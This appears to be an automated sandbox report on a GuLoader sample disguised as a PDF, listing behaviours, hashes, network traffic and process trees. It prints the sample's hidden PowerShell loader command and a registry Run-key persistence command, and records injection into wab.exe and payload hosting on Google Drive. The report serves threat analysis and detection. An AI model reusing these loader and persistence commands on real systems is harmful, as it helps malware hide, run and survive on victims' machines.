Analysis Overview
SHA256
a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
Threat Level: Known bad
The file Vendor Data Requirements·pdf.exe was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Program crash
Enumerates physical storage devices
NSIS installer
Modifies registry key
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 09:49
Signatures
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 09:49
Reported
2024-07-09 09:51
Platform
win7-20240704-en
Max time kernel
95s
Max time network
101s
Command Line
Signatures
Guloader,Cloudeye
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2380 set thread context of 2752 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
Files
memory/2380-11-0x0000000073801000-0x0000000073802000-memory.dmp
memory/2380-12-0x0000000073800000-0x0000000073DAB000-memory.dmp
memory/2380-13-0x0000000073800000-0x0000000073DAB000-memory.dmp
memory/2380-14-0x0000000073800000-0x0000000073DAB000-memory.dmp
memory/2380-15-0x0000000073800000-0x0000000073DAB000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp
| MD5 | 8172795f7c8cfb7cc597e879d2b0b468 |
| SHA1 | 811797a9309a1bc3429f3bc7735eb6af1a7c80dc |
| SHA256 | 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c |
| SHA512 | 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322 |
memory/2380-18-0x0000000073800000-0x0000000073DAB000-memory.dmp
memory/2380-19-0x0000000073800000-0x0000000073DAB000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Skyldsttendes.Und
| MD5 | be381f7baf52513e52dfed9361a6dc69 |
| SHA1 | a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a |
| SHA256 | caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79 |
| SHA512 | c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a |
memory/2380-21-0x0000000073800000-0x0000000073DAB000-memory.dmp
memory/2380-22-0x0000000073800000-0x0000000073DAB000-memory.dmp
memory/2380-23-0x0000000006330000-0x0000000008B6F000-memory.dmp
memory/2752-44-0x0000000000940000-0x00000000019A2000-memory.dmp
memory/2752-45-0x00000000019B0000-0x00000000041EF000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-09 09:49
Reported
2024-07-09 09:51
Platform
win10v2004-20240704-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4056 wrote to memory of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4056 wrote to memory of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4056 wrote to memory of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3060 -ip 3060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 2452
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/3060-9-0x000000007384E000-0x000000007384F000-memory.dmp
memory/3060-10-0x0000000002E00000-0x0000000002E36000-memory.dmp
memory/3060-11-0x00000000055E0000-0x0000000005C08000-memory.dmp
memory/3060-12-0x0000000073840000-0x0000000073FF0000-memory.dmp
memory/3060-13-0x0000000073840000-0x0000000073FF0000-memory.dmp
memory/3060-14-0x0000000005400000-0x0000000005422000-memory.dmp
memory/3060-15-0x0000000005D10000-0x0000000005D76000-memory.dmp
memory/3060-16-0x0000000005D80000-0x0000000005DE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2v2wgla.tnr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3060-26-0x0000000005DF0000-0x0000000006144000-memory.dmp
memory/3060-27-0x00000000063D0000-0x00000000063EE000-memory.dmp
memory/3060-28-0x0000000006420000-0x000000000646C000-memory.dmp
memory/3060-29-0x00000000073A0000-0x0000000007436000-memory.dmp
memory/3060-30-0x0000000006910000-0x000000000692A000-memory.dmp
memory/3060-31-0x0000000006930000-0x0000000006952000-memory.dmp
memory/3060-32-0x00000000079F0000-0x0000000007F94000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp
| MD5 | 8172795f7c8cfb7cc597e879d2b0b468 |
| SHA1 | 811797a9309a1bc3429f3bc7735eb6af1a7c80dc |
| SHA256 | 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c |
| SHA512 | 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322 |
memory/3060-34-0x0000000008620000-0x0000000008C9A000-memory.dmp
memory/3060-36-0x0000000073840000-0x0000000073FF0000-memory.dmp